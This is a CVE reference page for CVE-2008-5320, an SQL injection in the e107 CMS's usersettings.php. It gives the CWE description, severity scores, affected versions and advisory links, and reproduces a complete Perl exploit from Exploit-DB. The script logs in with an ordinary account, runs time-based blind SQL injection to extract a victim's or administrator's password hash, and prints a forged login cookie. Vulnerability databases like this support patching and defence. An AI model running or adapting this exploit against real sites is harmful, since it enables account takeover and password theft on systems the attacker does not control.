CVE-2008-5320 : Detail

CVE-2008-5320

SQL Injection
A03-Injection
0.11%V3
Network
2008-12-03
18h00 +00:00
2017-09-28
10h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

SQL injection vulnerability in usersettings.php in e107 0.7.13 and earlier allows remote authenticated users to execute arbitrary SQL commands via the ue[] parameter.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data.

Metrics

Metrics Score Severity CVSS Vector Source
V2 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 6791

Publication date : 2008-10-18 22h00 +00:00
Author : girex
EDB Verified : Yes

# Author: __GiReX__ # Homepage: http://girex.altervista.org # Date: 19/10/2008 # CMS: e107 # URL: http://e107.org/ # Note: Works regardless of php.ini settings (magic_quotes, register_globals..) # Attenction: This exploit was written for educational purpose. # Use it at your own risk. Author will be not responsible for any damage. # Description: e107 is a content management system written in PHP # and using the popular open source MySQL database system for content storage. # It's completely free, totally customisable and in constant development. # Bug description: # e107 presents a vuln in userssettings.php (line 363-395), a POST array ($_POST['ue']) # goes into an update query, it cleans the values of this array but not the keys name... # File: usersettings.php (line 363-395) if($_POST['ue']) ... foreach($_POST['ue'] as $key => $val) $err = $ue->user_extended_validate_entry($val,$extList[$key]); if(!$err) $val = $tp->toDB($val); <== Cleans values $ue_fields .= $key."='".$val."'"; <== Here our $_POST['ue'] keys and values } } ... # Lines: 496-500 if($ue_fields) { // ***** Next line creates a record which presumably should be there anyway, so could generate an error $sql->db_Select_gen("INSERT INTO #user_extended (user_extended_id, user_hidden_fields) values ('".intval($inp)."', '')"); $sql->db_Update("user_extended", $ue_fields." WHERE user_extended_id = '".intval($inp)."'"); <== Here vulnearable query } # As you can see the return value of the update query isn't checked so we have to use a blind benchmark() method #!/usr/bin/perl # e107 <= 0.7.13 Blind SQL Injection Exploit # Admin/User's Password Retrieve Exploit # Works regardless of php.ini settings # Coded by __GiReX__ use POSIX; use LWP::UserAgent; use HTTP::Cookies; use Digest::MD5 qw(md5 md5_hex md5_base64); if(@ARGV < 4) { banner(); print "[+] You need an user account to run this exploit\n\n"; print "[+] Usage: perl $0 <host> <path> <your_username> <your_pass> <victim_id>\n"; print "[+] Example: perl $0 localhost /e107/ test password 1\n"; exit; } my $target = ($ARGV[0] =~ /^http:\/\//) ? $ARGV[0].$ARGV[1]: 'http://' . $ARGV[0].$ARGV[1]; my ($user, $pass, $id) = ($ARGV[2], $ARGV[3], ($ARGV[4]) ? $ARGV[4] : 1); my $lwp = new LWP::UserAgent or die; my $cookie_jar = new HTTP::Cookies or die; $lwp->cookie_jar( $cookie_jar ); my @cset = (48..57, 97..102); my $benchmark = 1000000; my $prefix = "e107"; my $hash = ""; banner(); try_login($user, $pass) or die "[-] Unable to login with $user and $pass\n"; syswrite(STDOUT, "[+] Logged in with your account..\n". "[+] Checking database delay, please wait..\n\n" ); $ndelay = check_bench("1=0"); print STDOUT "[+] Normal delay: $ndelay\n"; $bdelay = check_bench("1=1"); print STDOUT "[+] Benchmark delay: $bdelay\n\n"; if($bdelay - $ndelay < 4) { print STDOUT "[-] Benchmarck delay too small compared to normal delay, increase it.\n"; exit (); } for(my $j = 1; $j <= 32; $j++) { foreach $char(@cset) { info(chr($char), $hash, "password"); my ($pre_time, $post_time) = time(); $rv = check_char($char, $j, "user_password"); $post_time = time(); if($rv and ($post_time - $pre_time) > ($ndelay + 3)) { $hash .= chr($char); last; } } last if $j != length($hash); } if(not defined $hash or length($hash) != 32) { print STDOUT "\n\n[-] Exploit mistake: please re-check benchmark\n"; exit; } else { print STDOUT "\n\n[+] You can try to login with this cookie:\n"; print STDOUT "[+] Cookie: ${cookie_prefix}cookie=${id}.". md5_hex($hash)."\n"; } sub try_login { my ($user, $pass) = @_; my $res = $lwp->post( $target.'news.php' , [ 'username' => $user, 'userpass' => $pass, 'userlogin' => 'Login', 'autologin' => '1' ] ); if($res->status_line =~ /^302|200|301/ or $res->is_success) { if($res->as_string =~ /Set-Cookie: (.+)cookie/) { $cookie_prefix = $1; return 1; } return undef; } die ("[-] Unable to request ${target}news.php ".$res->status_line."\n"); } sub info { my($c, $cur, $str) = @_; $cur = '' unless defined $cur; print STDOUT "[+] Victim ${str}: ${cur}${c}\r"; $| = 1; } sub check_bench { my $true = shift; my $delay = 0; my $sql = "user_hidden_fields=99 AND CASE WHEN(${true}) THEN benchmark(${benchmark}, MD5(1)) END#"; for(1..3) { my ($pre_time, $post_time) = time(); my $res = $lwp->post( $target.'usersettings.php', [ 'email' => 'damn@email.com', 'updatesettings' => 'Save Settings', "ue[${sql}]" => 'damn' ]); $post_time = time(); $delay += int($post_time - $pre_time); } return ceil($delay / 3); } sub check_char { my ($char, $n, $field) = @_ ; $rand = int($char + $n); my $sql = "user_hidden_fields=${rand} AND CASE WHEN(SELECT ASCII(SUBSTRING(${field},${n},1)) ". "FROM ${prefix}_user WHERE user_id=${id})=${char} THEN benchmark(${benchmark}, MD5(1)) END#"; my $res = $lwp->post( $target.'usersettings.php', [ 'email' => 'damn@email.com', 'updatesettings' => 'Save Settings', "ue[${sql}]" => 'damn' ]); return $res->is_success; } sub banner { print "\n"; print "[+] e107 <= 0.7.13 Blind SQL Injection\n"; print "[+] Admin/User's Password Retrieve Exploit\n"; print "[+] Coded by __GiReX__\n"; print "\n"; } # milw0rm.com [2008-10-19]

Products Mentioned

Configuraton 0

E107>>E107 >> Version To (including) 0.7.13

E107>>E107 >> Version 0.7

E107>>E107 >> Version 0.7.1

E107>>E107 >> Version 0.7.2

E107>>E107 >> Version 0.7.3

E107>>E107 >> Version 0.7.4

E107>>E107 >> Version 0.7.5

E107>>E107 >> Version 0.7.6

E107>>E107 >> Version 0.7.7

E107>>E107 >> Version 0.7.8

E107>>E107 >> Version 0.7.9

E107>>E107 >> Version 0.7.10

E107>>E107 >> Version 0.7.11

E107>>E107 >> Version 0.547_beta

    E107>>E107 >> Version 0.548_beta

      E107>>E107 >> Version 0.549_beta

        E107>>E107 >> Version 0.551_beta

          E107>>E107 >> Version 0.552_beta

            E107>>E107 >> Version 0.553_beta

              E107>>E107 >> Version 0.554_beta

                E107>>E107 >> Version 0.555_beta

                  E107>>E107 >> Version 0.600

                  E107>>E107 >> Version 0.601

                  E107>>E107 >> Version 0.602

                  E107>>E107 >> Version 0.603

                  E107>>E107 >> Version 0.604

                  E107>>E107 >> Version 0.605

                  E107>>E107 >> Version 0.606

                  E107>>E107 >> Version 0.607

                  E107>>E107 >> Version 0.608

                  E107>>E107 >> Version 0.609

                  E107>>E107 >> Version 0.610

                  E107>>E107 >> Version 0.611

                  E107>>E107 >> Version 0.612

                  E107>>E107 >> Version 0.613

                  E107>>E107 >> Version 0.614

                  E107>>E107 >> Version 0.615

                  E107>>E107 >> Version 0.615a

                  E107>>E107 >> Version 0.616

                  E107>>E107 >> Version 0.617

                  E107>>E107 >> Version 0.6171

                  E107>>E107 >> Version 0.6172

                  E107>>E107 >> Version 0.6173

                  E107>>E107 >> Version 0.6174

                  E107>>E107 >> Version 0.6175

                  E107>>E107 >> Version 5.1

                    E107>>E107 >> Version 5.3_beta

                      E107>>E107 >> Version 5.3_beta2

                        E107>>E107 >> Version 5.04

                          E107>>E107 >> Version 5.4_beta1

                            E107>>E107 >> Version 5.4_beta3

                              E107>>E107 >> Version 5.4_beta4

                                E107>>E107 >> Version 5.4_beta5

                                  E107>>E107 >> Version 5.4_beta6

                                    E107>>E107 >> Version 5.05

                                      E107>>E107 >> Version 5.21

                                        References

                                        http://securityreason.com/securityalert/4683
                                        Tags : third-party-advisory, x_refsource_SREASON
                                        http://www.securityfocus.com/bid/31821
                                        Tags : vdb-entry, x_refsource_BID
                                        https://www.exploit-db.com/exploits/6791
                                        Tags : exploit, x_refsource_EXPLOIT-DB
                                        http://secunia.com/advisories/32322
                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                        http://www.vupen.com/english/advisories/2008/2860
                                        Tags : vdb-entry, x_refsource_VUPEN